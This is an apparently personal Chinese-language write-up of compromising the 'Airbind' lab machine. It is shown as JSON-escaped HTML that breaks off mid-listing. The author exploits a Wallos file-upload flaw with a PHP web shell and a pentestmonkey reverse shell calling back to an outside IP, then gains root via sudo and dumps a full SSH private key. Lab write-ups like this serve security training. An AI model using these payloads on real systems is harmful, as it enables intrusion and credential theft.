![\"image-20240912140731229\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229354.png\")
<\/div>\n
![\"image-20240912143633016\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229356.png\")
<\/div><\/p>\n\u4e00\u770b\u662f\u81ea\u5bb6\u8def\u7531\u5668\u3002\u3002\u3002\u770b\u6765\u673a\u5668\u641e\u9519\u4e86\uff0c\u5c1d\u8bd5\u91cd\u65b0\u5bfc\u5165\uff1a<\/p>\n
![\"image-20241213224256153\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229357.png\")
<\/div><\/p>\n\u4f9d\u7136\u626b\u4e0d\u5230\uff0c\u5c1d\u8bd5\u63a5\u7740\u641e\u5427\uff01\u91cd\u65b0\u5bfc\u5165\uff0c\u5904\u7406\u5668\u548c\u5185\u5b58\u7ffb\u500d\uff0c\u4f46\u4ecd\u7136\u4e0d\u884c\u3002\u3002\u3002\u3002\u7136\u540e\u6539\u4e86\u4e00\u624b\u6865\u63a5\u53d1\u73b0\u884c\u4e86\uff01<\/p>\n
![\"image-20241214105313554\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202412141229358.png\")
<\/div><\/p>\n\u4fe1\u606f\u641c\u96c6<\/h2>\n\u7aef\u53e3\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ IP=10.0.2.21 \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---. .----. .---. .--. .-. .-.\n| {} }| { } |{ {__ {_ _}{ {__ \/ ___} \/ {} \\ | `| |\n| .-. \\| {_} |.-._} } | | .-._} }\\ }\/ \/\\ \\| |\\ |\n`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\n\ud83d\ude35 https:\/\/admin.tryhackme.com\n\n[~] The config file is expected to be at "\/home\/kali\/.rustscan.toml"\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. \nOpen 10.0.2.21:80\n[~] Starting Script(s)\n[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")\n\nPORT STATE SERVICE REASON VERSION\n80\/tcp open http syn-ack Apache httpd 2.4.57 ((Ubuntu))\n| http-methods: \n|_ Supported Methods: GET HEAD POST OPTIONS\n|_http-server-header: Apache\/2.4.57 (Ubuntu)\n| http-title: Wallos - Subscription Tracker\n|_Requested resource was login.php\n| http-cookie-flags: \n| \/: \n| PHPSESSID: \n|_ httponly flag not set\n|_http-favicon: Unknown favicon MD5: 81452C705B6AAB657F745B6FB4966367<\/code><\/pre>\n\u76ee\u5f55\u626b\u63cf<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -d 1 -s 200 301 302 \n\n ___ ___ __ __ __ __ __ ___\n|__ |__ |__) |__) | \/ ` \/ \\ \\_\/ | | \\ |__\n| |___ | \\ | \\ | \\__, \\__\/ \/ \\ | |__\/ |___\nby Ben "epi" Risher \ud83e\udd13 ver: 2.10.4\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfaf Target Url \u2502 http:\/\/10.0.2.21\n \ud83d\ude80 Threads \u2502 50\n \ud83d\udcd6 Wordlist \u2502 \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n \ud83d\udc4c Status Codes \u2502 [200, 301, 302]\n \ud83d\udca5 Timeout (secs) \u2502 7\n \ud83e\udda1 User-Agent \u2502 feroxbuster\/2.10.4\n \ud83d\udc89 Config File \u2502 \/etc\/feroxbuster\/ferox-config.toml\n \ud83d\udd0e Extract Links \u2502 true\n \ud83c\udfc1 HTTP methods \u2502 [GET]\n \ud83d\udd03 Recursion Depth \u2502 1\n \ud83c\udf89 New Version Available \u2502 https:\/\/github.com\/epi052\/feroxbuster\/releases\/latest\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfc1 Press [ENTER] to use the Scan Management Menu\u2122\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n302 GET 0l 0w 0c http:\/\/10.0.2.21\/ => login.php\n301 GET 9l 28w 307c http:\/\/10.0.2.21\/images => http:\/\/10.0.2.21\/images\/\n301 GET 9l 28w 308c http:\/\/10.0.2.21\/scripts => http:\/\/10.0.2.21\/scripts\/\n301 GET 9l 28w 312c http:\/\/10.0.2.21\/screenshots => http:\/\/10.0.2.21\/screenshots\/\n301 GET 9l 28w 309c http:\/\/10.0.2.21\/includes => http:\/\/10.0.2.21\/includes\/\n301 GET 9l 28w 303c http:\/\/10.0.2.21\/db => http:\/\/10.0.2.21\/db\/\n301 GET 9l 28w 307c http:\/\/10.0.2.21\/styles => http:\/\/10.0.2.21\/styles\/\n301 GET 9l 28w 305c http:\/\/10.0.2.21\/libs => http:\/\/10.0.2.21\/libs\/\n[###>----------------] - 5m 36589\/220553 27m found:8 errors:2 \n\ud83d\udea8 Caught ctrl+c \ud83d\udea8 saving scan state to ferox-http_10_0_2_21-1734145306.state ...\n[###>----------------] - 5m 36589\/220553 27m found:8 errors:2 \n[###>----------------] - 5m 36575\/220546 114\/s http:\/\/10.0.2.21\/<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ whatweb http:\/\/$IP \nhttp:\/\/10.0.2.21 [302 Found] Apache[2.4.57], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache\/2.4.57 (Ubuntu)], IP[10.0.2.21], RedirectLocation[login.php]\nhttp:\/\/10.0.2.21\/login.php [200 OK] Apache[2.4.57], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache\/2.4.57 (Ubuntu)], IP[10.0.2.21], PasswordField[password], Title[Wallos - Subscription Tracker]<\/code><\/pre>\n\u53d1\u73b0\u4e86\u7591\u4f3c\u6846\u67b6\uff0c\u5c1d\u8bd5\u68c0\u7d22\u4e00\u4e0b\uff1a<\/p>\n
![\"image-20241214105749024\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u5f97\u770b\u4e00\u4e0b\u7248\u672c\u53f7\u5bf9\u4e0d\u5bf9\uff1a<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ curl -s http:\/\/$IP\/login.php \n<!DOCTYPE html>\n<html>\n<head>\n <meta charset="UTF-8">\n <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">\n <meta name="theme-color" content="#FFFFFF"\/>\n <title>Wallos - Subscription Tracker<\/title>\n <link rel="icon" type="image\/png" href="images\/icon\/favicon.ico" sizes="16x16">\n <link rel="apple-touch-icon" sizes="180x180" href="images\/icon\/apple-touch-icon.png">\n <link rel="manifest" href="manifest.json">\n <link rel="stylesheet" href="styles\/login.css?v1.11.0">\n <link rel="stylesheet" href="styles\/barlow.css">\n <link rel="stylesheet" href="styles\/login-dark-theme.css?v1.11.0" id="dark-theme" disabled>\n<\/head>\n<body>\n <div class="content">\n <section class="container">\n <header>\n <img src="images\/wallossolid.png" alt="Wallos Logo" title="Wallos - Subscription Tracker" \/> <p>\n Please login <\/p>\n <\/header>\n <form action="login.php" method="post">\n <div class="form-group">\n <label for="username">Username:<\/label>\n <input type="text" id="username" name="username" required>\n <\/div>\n <div class="form-group">\n <label for="password">Password:<\/label>\n <input type="password" id="password" name="password" required>\n <\/div>\n <div class="form-group-inline">\n <input type="checkbox" id="remember" name="remember">\n <label for="remember">Stay logged in (30 days)<\/label>\n <\/div>\n <div class="form-group">\n <input type="submit" value="Login">\n <\/div>\n <\/form>\n <\/section>\n <\/div>\n<\/body>\n<\/html> <\/code><\/pre>\n\u53d1\u73b0\u7248\u672c\u53f7\u7591\u4f3c1.11.0<\/code>\uff0c\u5c1d\u8bd5\u8fdb\u884c\u5229\u7528\uff01<\/p>\n\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\u5229\u7528<\/h3>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ searchsploit -m php\/webapps\/51924.txt\n Exploit: Wallos < 1.11.2 - File Upload RCE\n URL: https:\/\/www.exploit-db.com\/exploits\/51924\n Path: \/usr\/share\/exploitdb\/exploits\/php\/webapps\/51924.txt\n Codes: N\/A\n Verified: False\nFile Type: ASCII text\nCopied to: \/home\/kali\/temp\/Airbind\/51924.txt\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ ls\n51924.txt ferox-http_10_0_2_21-1734144980.state\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ cat 51924.txt \n# Exploit Title: Wallos - File Upload RCE (Authenticated)\n# Date: 2024-03-04\n# Exploit Author: sml@lacashita.com\n# Vendor Homepage: https:\/\/github.com\/ellite\/Wallos\n# Software Link: https:\/\/github.com\/ellite\/Wallos\n# Version: < 1.11.2\n# Tested on: Debian 12\n\nWallos allows you to upload an image\/logo when you create a new subscription.\nThis can be bypassed to upload a malicious .php file.\n\nPOC\n---\n\n1) Log into the application.\n2) Go to "New Subscription"\n3) Upload Logo and choose your webshell .php\n4) Make the Request changing Content-Type to image\/jpeg and adding "GIF89a", it should be like:\n\n--- SNIP -----------------\n\nPOST \/endpoints\/subscription\/add.php HTTP\/1.1\n\nHost: 192.168.1.44\n\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:102.0) Gecko\/20100101 Firefox\/102.0\n\nAccept: *\/*\n\nAccept-Language: en-US,en;q=0.5\n\nAccept-Encoding: gzip, deflate\n\nReferer: http:\/\/192.168.1.44\/\n\nContent-Type: multipart\/form-data; boundary=---------------------------29251442139477260933920738324\n\nOrigin: http:\/\/192.168.1.44\n\nContent-Length: 7220\n\nConnection: close\n\nCookie: theme=light; language=en; PHPSESSID=6a3e5adc1b74b0f1870bbfceb16cda4b; theme=light\n\n-----------------------------29251442139477260933920738324\n\nContent-Disposition: form-data; name="name"\n\ntest\n\n-----------------------------29251442139477260933920738324\n\nContent-Disposition: form-data; name="logo"; filename="revshell.php"\n\nContent-Type: image\/jpeg\n\nGIF89a;\n\n<?php\nsystem($_GET['cmd']);\n?>\n\n-----------------------------29251442139477260933920738324\n\nContent-Disposition: form-data; name="logo-url"\n\n----- SNIP -----\n\n5) You will get the response that your file was uploaded ok:\n\n{"status":"Success","message":"Subscription updated successfully"}\n\n6) Your file will be located in:\nhttp:\/\/VICTIM_IP\/images\/uploads\/logos\/XXXXXX-yourshell.php <\/code><\/pre>\n\u5f31\u5bc6\u7801<\/h4>\n
\u5c1d\u8bd5\u6309\u7167\u6559\u7a0b\u8fdb\u884c\u5229\u7528\u4e00\u4e0b\uff01\u4f46\u662f\u53d1\u73b0\u6ca1\u6709\u7528\u6237\u548c\u5bc6\u7801\uff0c\u5c1d\u8bd5\u4e00\u4e0b\u5f31\u53e3\u4ee4\uff0c\u53d1\u73b0admin:admin<\/code>\u53ef\u4ee5\u6b63\u5e38\u8fdb\u5165\u3002<\/p>\n\u5176\u5b9e\u8fd9\u4e00\u4e2a\u4e5f\u6cc4\u9732\u8fc7\uff0c\u4f46\u662f\u4e4b\u524d\u6ca1\u53d1\u73b0\uff1a<\/p>\n
<\/div><\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ curl -s http:\/\/10.0.2.21\/db\/ | html2text\n****** Index of \/db ******\n[[ICO]] Name Last_modified Size Description\n===========================================================================\n[[PARENTDIR]] Parent_Directory - \n[[ ]] wallos.db 2024-12-14 03:05 64K \n===========================================================================\n Apache\/2.4.57 (Ubuntu) Server at 10.0.2.21 Port 80\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ wget http:\/\/10.0.2.21\/db\/wallos.db \n--2024-12-13 22:09:59-- http:\/\/10.0.2.21\/db\/wallos.db\nConnecting to 10.0.2.21:80... connected.\nHTTP request sent, awaiting response... 200 OK\nLength: 65536 (64K)\nSaving to: \u2018wallos.db\u2019\n\nwallos.db 100%[====================================================================================================>] 64.00K --.-KB\/s in 0.003s \n\n2024-12-13 22:10:00 (21.1 MB\/s) - \u2018wallos.db\u2019 saved [65536\/65536]\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ sqlite3 wallos.db\nSQLite version 3.45.1 2024-01-30 16:01:20\nEnter ".help" for usage hints.\nsqlite> .tables\ncategories login_tokens \ncurrencies migrations \ncycles notifications \nfixer payment_methods \nfrequencies settings \nhousehold subscriptions \nlast_exchange_update user \nlast_update_next_payment_date\nsqlite> select * from user;\n1|admin|admin@localhost.com|$2y$10$2XxuEupev6gU1qWoURsIYu7XHNiy7nve9iq7H0mUX\/MzFnmvbxC9S|1|0|en<\/code><\/pre>\n\u67e5\u4e00\u4e0b\u4e5f\u662fadmin<\/code>.<\/p>\n<\/div>
\n<\/div><\/p>\n\u6293\u5305\u6539\u5305<\/h4>\n
\u5148\u51c6\u5907\u4e00\u4e2a\u53cd\u5f39shell!<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ vim shell.php\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ head shell.php \nGIF89a;\n <?php\n \/\/ php-reverse-shell - A Reverse Shell implementation in PHP\n \/\/ Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n\n set_time_limit (0);\n $VERSION = "1.0";\n $ip = '192.168.10.103'; \/\/ You have changed this\n $port = 1234; \/\/ And this\n $chunk_size = 1400;<\/code><\/pre>\n\u7136\u540e\u6dfb\u52a0\u8ba2\u9605\uff01<\/p>\n
<\/div><\/p>\n\u6539\u4e2a\u5305\uff1a<\/p>\n
Content-Type: application\/x-php\n\nContent-Type: image\/jpeg<\/code><\/pre>\n\u7136\u540e\u4fdd\u5b58\u4e00\u4e0b\uff0c\u8bbf\u95ee\u4e00\u4e0b\uff1a<\/p>\n
<\/div>
\n<\/div><\/p>\n\u7136\u540e\u5c1d\u8bd5\u8bbf\u95ee\u6fc0\u6d3b\uff1a<\/p>\n
<\/div><\/p>\n\u4f46\u662f\u4e0d\u884c\uff0c\u8001\u8001\u5b9e\u5b9e\u4e00\u53e5\u8bdd\u5427\u3002\u3002\u3002\u3002<\/p>\n
GIF89a;\n\n<?php\nsystem($_GET['cmd']);\n?><\/code><\/pre>\n\u518d\u8fdb\u884c\u5c1d\u8bd5\uff01<\/p>\n
\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ curl 'http:\/\/10.0.2.21\/images\/uploads\/logos\/1734147609-shell.php?cmd=whoami'\nGIF89a;\n\nwww-data<\/code><\/pre>\n\u6210\u529f\uff0c\u5c1d\u8bd5\u53cd\u5f39shell\uff01(\u7a81\u7136\u60f3\u8d77\u6765\u5931\u8d25\u53ef\u80fd\u662f\u56e0\u4e3a\u6211\u7684\u90a3\u4e2ashell\u7684ip\u586b\u9519\u4e86\u3002\u3002\u3002\u3002\u3002\u4e8e\u662f\u6211\u91cd\u65b0\u5c1d\u8bd5\u4e86\u4e00\u4e0b\uff0c\u53d1\u73b0\u6210\u529f\u4e86\u3002\u3002\u3002\u3002)<\/p>\n
<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@ubuntu:\/$ whoami;id;hostname\nwww-data\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\nubuntu\n(remote) www-data@ubuntu:\/$ sudo -l\nMatching Defaults entries for www-data on ubuntu:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin, use_pty\n\nUser www-data may run the following commands on ubuntu:\n (ALL) NOPASSWD: ALL\n(remote) www-data@ubuntu:\/$ sudo su\nroot@ubuntu:\/# whoami;id\nroot\nuid=0(root) gid=0(root) groups=0(root)\nroot@ubuntu:\/# pwd\n\/\nroot@ubuntu:\/# cd ~\nroot@ubuntu:~# pwd\n\/root\nroot@ubuntu:~# ls -la\ntotal 40\ndrwx------ 4 root root 4096 May 21 2024 .\ndrwxr-xr-x 17 root root 4096 Dec 14 02:52 ..\nlrwxrwxrwx 1 root root 9 Apr 2 2024 .bash_history -> \/dev\/null\n-rw-r--r-- 1 root root 3106 Oct 17 2022 .bashrc\n-rw------- 1 root root 20 May 21 2024 .lesshst\ndrwxr-xr-x 3 root root 4096 Apr 1 2024 .local\n-rw-r--r-- 1 root root 161 Jul 9 2019 .profile\n-rw-r--r-- 1 root root 66 May 21 2024 .selected_editor\n-rw------- 1 root root 300 May 21 2024 .sqlite_history\ndrwx------ 2 root root 4096 Apr 2 2024 .ssh\n-rwx------ 1 root root 33 Apr 2 2024 user.txt\n-rw------- 1 root root 0 May 21 2024 .wpa_cli_history<\/code><\/pre>\n\u4f46\u662f\u53ea\u6709\u4e00\u4e2auser\u7684flag\u4ee5\u53ca\u79c1\u94a5\uff0c\u5148\u4fdd\u5b58\u4e0b\u6765\uff1a<\/p>\n
root@ubuntu:~\/.ssh# cat id_rsa\n-----BEGIN OPENSSH PRIVATE KEY-----\nb3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABlwAAAAdzc2gtcn\nNhAAAAAwEAAQAAAYEAzhi8CwvvtsKmKafXglHqWyCTjiy4wSfUkwGlQkJ+flYthTVBAJ\/L\nGxPkEjSi5G6eBYyME9Pm8xBbacS1Jbr18IYIPYy0fu9j7MXRTpvYTITHIrk3g2oLs+2f+I\nhZqm1cVr4MgTjxl62\/hcZoIZoALz02uFzmdiOc19mrrD+cVoop0gpG5VMI6pCwF3fiK17q\nWbyjt62i7VsrhQ8kMWaT7HXBK30k06EyBlUK4sRLarr\/rMCqSCqJ\/TwJP3cs4d+5LssLxY\nRIxJMh6B94mT7K3MA034e4PpUz8frw1eT7FyUd8XGsipWuKAmwPVymNGEQFvKaGJ6IMLF6\nb5KFReygmfYkGBLNjhP1waDU7NxqVriKN59DGebMfvW8rIll\/sIPqyEJOTr+7EF74Dv03q\nneH2hMrgu7Duonn7sM9DUgAu9CRXai3cxPFQMokmEZbblfwwJWaw94w4cqzVsenX5GQxFb\nAUfSYDdrY+qmO8+xr9FP14DbfPbvn+Cof0G4sL99AAAFgCRJ8E8kSfBPAAAAB3NzaC1yc2\nEAAAGBAM4YvAsL77bCpimn14JR6lsgk44suMEn1JMBpUJCfn5WLYU1QQCfyxsT5BI0ouRu\nngWMjBPT5vMQW2nEtSW69fCGCD2MtH7vY+zF0U6b2EyExyK5N4NqC7Ptn\/iIWaptXFa+DI\nE48Zetv4XGaCGaAC89Nrhc5nYjnNfZq6w\/nFaKKdIKRuVTCOqQsBd34ite6lm8o7etou1b\nK4UPJDFmk+x1wSt9JNOhMgZVCuLES2q6\/6zAqkgqif08CT93LOHfuS7LC8WESMSTIegfeJ\nk+ytzANN+HuD6VM\/H68NXk+xclHfFxrIqVrigJsD1cpjRhEBbymhieiDCxem+ShUXsoJn2\nJBgSzY4T9cGg1Ozcala4ijefQxnmzH71vKyJZf7CD6shCTk6\/uxBe+A79N6p3h9oTK4Luw\n7qJ5+7DPQ1IALvQkV2ot3MTxUDKJJhGW25X8MCVmsPeMOHKs1bHp1+RkMRWwFH0mA3a2Pq\npjvPsa\/RT9eA23z275\/gqH9BuLC\/fQAAAAMBAAEAAAGAAezkutSwd1xfqYV2I7NItXO7NS\nmRS0qoN3xdMx6EaIE9GSC7e\/pCLz1TFOF1gR1QcBxVRa0l2\/Dz7avHBnR17jqOUqbhG8t4\nO0LI1wtpLKPT6WziCiIAPHzUkQGTFt7BLVVGsCFcTm6y2pjVKbUy2b4gZ\/4EMCfahAC2VB\nxfBUbyp5HtgiBxtaFG5904mW+gUFjNDb77RezjXfGbhLOg36Vk+ddINAruOPVr7dzoGHXp\nRA+jt5tgISPBsVxXaL\/Kiotyu\/mBkLU5BRe2X9cfrxfq48mfes+2QiQHzZEpd6AL5ESHO1\nzDFCSYM4HJUCSlvGYHd9Xi7EbFcQVg60d\/AI7D7q9KoVPYHf5K2gkzUAgR5LtRl9lQ+riX\nwOXviBEaC8iOF8VHB77EHdiUZHXtOovUdHqGlM98vwa8KgbUjYVaHtjYGvL0wb6Lp5jeKe\nbXcy+7W6F1IjxNKk7CSaXY00asfHpLRVwbURz\/505CqgQjBoSKKnnX\/wRZt5y35NzZAAAA\nwBbeKgaf45unZCyCXerjo4wON+ntDz1AbvUMeLDsJclnwtFdtedmrWnJZNkCVLMlX3b4q\/\nsQnz0xCD0UxkEkwaEqKrOXVPaqgSU+UdIj0e\/GObNiAfqoO4l04\/iqxs5ozh5+dzgCt7Fw\nporszJ48DU9dJ5mvgeNirRpDMJOIhf\/NZaA3YDGC4TziOl7bxMNPYuLqYED\/syjHYNVxvT\neEqNF5P4NsawKmu6ExKzgsPTRZ4PcT\/iQFsmsBozKbqUVZxwAAAMEA8fKsYXT\/AwoqExHZ\nYXcMQtAuM92isebSPv63Ssy9N+PaPsdKC6nl3CqENy3zBSE0Yo1LvclfS7gwACtedVWS2Q\nGqB6z\/q5gc2l6\/VG1s8WcG3cbUlKPzQDTsSMZ7CMYK0lMX1jvzXjwqdJ1pSxFZfMdHuJpy\n\/mxUrpsgwhbzP589qc\/UD\/FfKjPyVTm7qs8qNeJDNsjcIl0Wp59OvufRh+cAimGX1S68Er\n3H+DeE+Ymbi8e1rFN7C+HE1p6fqy3ZAAAAwQDaEQRgF2zKFz791AnRpx7I700k6q2RM1FZ\nYnsmIYfdk6EEwczZ3ed8nbH+CLmx7npdoKG5SUqx4XiELPO8qOpmNqZoHH\/1T3GxdjTRYc\ncL40NAQDN+gR4DCPO5tmc\/uojQm9Guhd7o8dQKAitjy6jrW+xDvtHNWl0gzKKZm3ndlwp7\nre+b97O6LhCm7mQ79hVX8mAyk2\/p129bzwGPtsSK3zB7zLksEKj0AlEEfiifyMjS9gNq0e\nEkGwPez9XGBEUAAAALcm9vdEB1YnVudHU=\n-----END OPENSSH PRIVATE KEY-----\nroot@ubuntu:~\/.ssh# cat id_rsa.pub \nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDOGLwLC++2wqYpp9eCUepbIJOOLLjBJ9STAaVCQn5+Vi2FNUEAn8sbE+QSNKLkbp4FjIwT0+bzEFtpxLUluvXwhgg9jLR+72PsxdFOm9hMhMciuTeDaguz7Z\/4iFmqbVxWvgyBOPGXrb+FxmghmgAvPTa4XOZ2I5zX2ausP5xWiinSCkblUwjqkLAXd+IrXupZvKO3raLtWyuFDyQxZpPsdcErfSTToTIGVQrixEtquv+swKpIKon9PAk\/dyzh37kuywvFhEjEkyHoH3iZPsrcwDTfh7g+lTPx+vDV5PsXJR3xcayKla4oCbA9XKY0YRAW8poYnogwsXpvkoVF7KCZ9iQYEs2OE\/XBoNTs3GpWuIo3n0MZ5sx+9bysiWX+wg+rIQk5Ov7sQXvgO\/Teqd4faEyuC7sO6iefuwz0NSAC70JFdqLdzE8VAyiSYRltuV\/DAlZrD3jDhyrNWx6dfkZDEVsBR9JgN2tj6qY7z7Gv0U\/XgNt89u+f4Kh\/Qbiwv30= root@ubuntu<\/code><\/pre>\n\u7136\u540e\u63a5\u7740\u627e\uff1a<\/p>\n
root@ubuntu:~# ip a\n1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000\n link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n inet 127.0.0.1\/8 scope host lo\n valid_lft forever preferred_lft forever\n inet6 ::1\/128 scope host \n valid_lft forever preferred_lft forever\n2: eth0@if8: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000\n link\/ether dc:a1:f7:82:76:13 brd ff:ff:ff:ff:ff:ff link-netnsid 0\n inet 10.0.3.241\/24 brd 10.0.3.255 scope global eth0\n valid_lft forever preferred_lft forever\n inet6 fe80::dea1:f7ff:fe82:7613\/64 scope link \n valid_lft forever preferred_lft forever\n3: wlan0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc mq state DOWN group default qlen 1000\n link\/ether 02:00:00:00:00:00 brd ff:ff:ff:ff:ff:ff\n6: ap0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\n link\/ether 42:00:00:00:00:00 brd ff:ff:ff:ff:ff:ff<\/code><\/pre>\n\u89e3\u6cd5\u4e00\uff1aIPV6\u7ed5\u8fc7iptables<\/h3>\n
\u8be6\u60c5\u53c2\u8003\uff1ahttps:\/\/www.bilibili.com\/video\/BV1j442197dv\/<\/a><\/p>\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ ping6 -I eth0 ff02::1\nping6: Warning: source address might be selected on device other than: eth0\nPING ff02::1 (ff02::1) from :: eth0: 56 data bytes\n64 bytes from fe80::99b:2e02:395e:4e6f%eth0: icmp_seq=1 ttl=64 time=0.025 ms\n64 bytes from fe80::a00:27ff:fe1b:404c%eth0: icmp_seq=1 ttl=64 time=2.10 ms\n64 bytes from fe80::99b:2e02:395e:4e6f%eth0: icmp_seq=2 ttl=64 time=0.031 ms\n64 bytes from fe80::a00:27ff:fe1b:404c%eth0: icmp_seq=2 ttl=64 time=0.806 ms\n64 bytes from fe80::99b:2e02:395e:4e6f%eth0: icmp_seq=3 ttl=64 time=0.034 ms\n64 bytes from fe80::a00:27ff:fe1b:404c%eth0: icmp_seq=3 ttl=64 time=0.742 ms\n64 bytes from fe80::99b:2e02:395e:4e6f%eth0: icmp_seq=4 ttl=64 time=0.034 ms\n64 bytes from fe80::a00:27ff:fe1b:404c%eth0: icmp_seq=4 ttl=64 time=1.08 ms\n64 bytes from fe80::99b:2e02:395e:4e6f%eth0: icmp_seq=5 ttl=64 time=0.034 ms\n64 bytes from fe80::a00:27ff:fe1b:404c%eth0: icmp_seq=5 ttl=64 time=1.33 ms\n^C\n--- ff02::1 ping statistics ---\n5 packets transmitted, 5 received, +5 duplicates, 0% packet loss, time 4031ms\nrtt min\/avg\/max\/mdev = 0.025\/0.621\/2.096\/0.683 ms\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ chmod 600 id_rsa \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ ssh root@fe80::99b:2e02:395e:4e6f%eth0 -i id_rsa\nThe authenticity of host 'fe80::99b:2e02:395e:4e6f%eth0 (fe80::99b:2e02:395e:4e6f%eth0)' can't be established.\nED25519 key fingerprint is SHA256:8cphJbastRTfWZolTBt5XJJ1GFOq9EbCLKKGghygXSo.\nThis host key is known by the following other names\/addresses:\n ~\/.ssh\/known_hosts:33: [hashed name]\nAre you sure you want to continue connecting (yes\/no\/[fingerprint])? yes\nWarning: Permanently added 'fe80::99b:2e02:395e:4e6f%eth0' (ED25519) to the list of known hosts.\nroot@fe80::99b:2e02:395e:4e6f%eth0's password: \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Airbind]\n\u2514\u2500$ ls -la\ntotal 180\ndrwxr-xr-x 2 kali kali 4096 Dec 13 22:55 .\ndrwxr-xr-x 136 kali kali 4096 Oct 9 02:52 ..\n-rw-r--r-- 1 kali kali 1808 